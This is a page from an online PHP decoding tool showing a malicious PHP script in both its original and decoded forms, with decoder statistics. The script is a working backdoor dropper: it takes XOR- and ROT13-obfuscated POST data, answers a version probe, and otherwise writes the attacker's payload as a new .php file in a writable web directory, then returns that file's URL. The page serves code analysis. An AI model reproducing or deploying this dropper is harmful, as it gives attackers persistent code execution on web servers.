Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $kckcpwbuoq = "pnkfkfgqvqwatcwf";$knball = "";foreach ($_POST as $lpdave => $ieqkh){..

Decoded Output download

<?php $kckcpwbuoq = "pnkfkfgqvqwatcwf";$knball = "";foreach ($_POST as $lpdave => $ieqkh){if (strlen($lpdave) == 16 and substr_count($ieqkh, "%") > 10){cebnccm($lpdave, $ieqkh);}}function cebnccm($lpdave, $kisutybla){global $knball;$knball = $lpdave;$kisutybla = str_split(rawurldecode(str_rot13($kisutybla)));function rfcgnlw($ntsgmmgr, $lpdave){global $kckcpwbuoq, $knball;return $ntsgmmgr ^ $kckcpwbuoq[$lpdave % strlen($kckcpwbuoq)] ^ $knball[$lpdave % strlen($knball)];}$kisutybla = implode("", array_map("rfcgnlw", array_values($kisutybla), array_keys($kisutybla)));$kisutybla = @unserialize($kisutybla);if (@is_array($kisutybla)){$lpdave = array_keys($kisutybla);$kisutybla = $kisutybla[$lpdave[0]];if ($kisutybla === $lpdave[0]){echo @serialize(Array('php' => @phpversion(), ));exit();}else{function nghap($vjmickir) {static $qzerk = array();$mtsnpdlv = glob($vjmickir . '/*', GLOB_ONLYDIR);if (count($mtsnpdlv) > 0) {foreach ($mtsnpdlv as $vjmick){if (@is_writable($vjmick)){$qzerk[] = $vjmick;}}}foreach ($mtsnpdlv as $vjmickir) nghap($vjmickir);return $qzerk;}$ydyfk = $_SERVER["DOCUMENT_ROOT"];$mtsnpdlv = nghap($ydyfk);$lpdave = array_rand($mtsnpdlv);$yqijmwvwrk = $mtsnpdlv[$lpdave] . "/" . substr(md5(time()), 0, 8) . ".php";@file_put_contents($yqijmwvwrk, $kisutybla);echo "http://" . $_SERVER["HTTP_HOST"] . substr($yqijmwvwrk, strlen($ydyfk));exit();}}} ?>

Did this file decode correctly?

Original Code

<?php $kckcpwbuoq = "pnkfkfgqvqwatcwf";$knball = "";foreach ($_POST as $lpdave => $ieqkh){if (strlen($lpdave) == 16 and substr_count($ieqkh, "%") > 10){cebnccm($lpdave, $ieqkh);}}function cebnccm($lpdave, $kisutybla){global $knball;$knball = $lpdave;$kisutybla = str_split(rawurldecode(str_rot13($kisutybla)));function rfcgnlw($ntsgmmgr, $lpdave){global $kckcpwbuoq, $knball;return $ntsgmmgr ^ $kckcpwbuoq[$lpdave % strlen($kckcpwbuoq)] ^ $knball[$lpdave % strlen($knball)];}$kisutybla = implode("", array_map("rfcgnlw", array_values($kisutybla), array_keys($kisutybla)));$kisutybla = @unserialize($kisutybla);if (@is_array($kisutybla)){$lpdave = array_keys($kisutybla);$kisutybla = $kisutybla[$lpdave[0]];if ($kisutybla === $lpdave[0]){echo @serialize(Array('php' => @phpversion(), ));exit();}else{function nghap($vjmickir) {static $qzerk = array();$mtsnpdlv = glob($vjmickir . '/*', GLOB_ONLYDIR);if (count($mtsnpdlv) > 0) {foreach ($mtsnpdlv as $vjmick){if (@is_writable($vjmick)){$qzerk[] = $vjmick;}}}foreach ($mtsnpdlv as $vjmickir) nghap($vjmickir);return $qzerk;}$ydyfk = $_SERVER["DOCUMENT_ROOT"];$mtsnpdlv = nghap($ydyfk);$lpdave = array_rand($mtsnpdlv);$yqijmwvwrk = $mtsnpdlv[$lpdave] . "/" . substr(md5(time()), 0, 8) . ".php";@file_put_contents($yqijmwvwrk, $kisutybla);echo "http://" . $_SERVER["HTTP_HOST"] . substr($yqijmwvwrk, strlen($ydyfk));exit();}}}

Function Calls

None

Variables

$knball
$kckcpwbuoq pnkfkfgqvqwatcwf

Stats

MD5 05d79dc4883d6efb77b0c5135ef232e2
Eval Count 0
Decode Time 87 ms